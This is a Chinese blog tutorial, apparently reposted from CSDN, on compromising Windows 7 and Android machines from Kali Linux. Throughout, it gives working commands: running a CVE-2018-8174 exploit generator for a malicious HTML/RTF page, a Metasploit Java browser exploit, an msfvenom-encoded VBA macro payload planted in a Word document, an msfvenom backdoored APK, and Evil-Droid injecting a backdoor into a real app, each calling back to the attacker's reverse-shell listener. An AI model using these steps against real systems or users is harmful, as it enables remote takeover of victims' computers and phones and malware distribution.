利用0day-java环境-宏感染-安卓客户端进行渗透

利用0day-java环境-宏感染-安卓客户端进行渗透,第1张

利用0day-java环境-宏感染-安卓客户端进行渗透 一、利用 0DAY 漏洞 CVE-2018-8174 获取 shell

0DAY 漏洞最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他 内容的。0day 中的 0 表示 zero,早期的 0day 表示在软件发行后的 24 小时内就出现破解版本,现在我 们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫 0day。 0day 是一个统称,所有的破解都可以叫 0day。

CVE-2018-8174 漏洞影响最新版本的 IE 浏览器及使用了 IE 内核的应用程序。用户在浏览网页或打 开 Office 文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在 2018 年 4 月 20 日早上 确认此漏洞,并于 2018 年 5 月 8 号发布了官方安全补丁,对该 0day 漏洞进行了修复,并将其命名为 CVE-2018-8174。

1、安装 CVE-2018-8174_EXP

这里给出利用CVE-2018-8174_EXP的github地址

https://github.com/Yt1g3r/CVE-2018-8174_EXP

在kali上git下来

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

2、生成恶意 html 文件

打开readme文件,查看具体使用方式

在CVE-2018-8174_EXP目录下执行命令

python CVE-2018-8174.py -u http://IP地址/exploit.html -o exp.rtf -i IP -p 端口

 注意文件是生成在当前目录,我们需要把它移到apache服务的目录下

mv exploit.html exp.rtf /var/www/html 

打开apache服务

systemctl start apache2

使用metasploit打开监听

msfdb run
use exploit/multi/handlerd
set lhost IP地址
set payload windows/shell/reverse_tcp
run

在Windows7中用IE浏览器打开网站

http://IP/exploit.html

 

 此时kali已拿到了目标的管理员权限

二、基于 java 环境的漏洞利用获取 shell

使用kali打开metasploit监听

use exploit/multi/browser/java_jre17_driver_manager
run

 在Windows7上安装对应的JAVA版本

这里给出相应地Java安装包

jre-7u17-windows-i586-系统安全文档类资源-CSDN下载

安装过程不多赘述,按照默认选项安装即可。

安装完成后,按照kali上的地址在浏览器中访问

 访问后出现如此界面

 选择LATER, 如果选择UPDATE,漏洞将被修复。

 跳转后,勾选“接受”,然后选择运行,如果取消就不会获得权限

运行后,kali已经获得了win7的权限

 三、利用宏感染 word 文档获取 shell

使用msfvenom生成宏病毒

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 -e x86/shikata_ga_nai -i 10 -f vba-exe

 复制红框中的内容,这是宏语言的内容

 

 新建一个word文档,打开“视图”工具栏,选择“宏”

 填写“宏名”后,选择“创建”

 

 将复制的内容粘贴到代码框中

 保存后返回word文档,将payload内容粘贴到word文档中

红线一下都是

 粘贴后保存关闭,再双击打开该文件,kali已经得到了管理员权限

 四、安卓客户端渗透

通过 MSF 生成一个 apk 的后门应用

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP地址 LPORT=端口 R > hack.apk

将它移到/var/www/html/目录下

mv hack.apk /var/www/html/

再Windows上下载,并在模拟器中安装再打开,kali即可获得权限

 当然也可以下载到自己手机中,部分功能可用

给程序安装后门

首先禁用IPv6

echo "net.ipv6.conf.eth0.disable_ipv6 = 1" >> /etc/sysctl.conf
sysctl -p

打开evil-droid文件

这里给大家准备了压缩包https://download.csdn.net/download/m0_47510703/78552314

cd Evil-Droid-master

我们需要修改一下evil-droid文件才能正常使用

vim evil-droid

修改第40行将“google.com”改为"baidu.com"

修改第649行将“-fa monaco”删去

退出保存即可。

然后为该文件添加执行去权限

chmod +x evil-droid

还要将tools文件夹下的apktool.jar替换为高版本

cp apktool_2.6.0.jar Evil-Droid-master/tools/apktool.jar

然后即可执行evil-droid文件

./evil-droid

它会自动为你下载需要的依赖,如果没有进行下载请更换一下源

选择3 ,IP地址和端口以及软件名称自定义即可,payload选择如下

 然后选择需要使用的安装包即可

完成后会提示你apk所在的位置

 点击“确定”后,会跳出如下界面,可以选择“确定”,也可以在msf中监听,这里我选择“exit”

 我们再将安装包移到apache服务下,并再次开启apache

evil-droid结束后会自动关闭apache服务一定要再次手动开启

mv evilapk.apk /var/www/html
systemctl start apache2

下载好后,打开,kali'上即获得了对应权限

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5716781.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存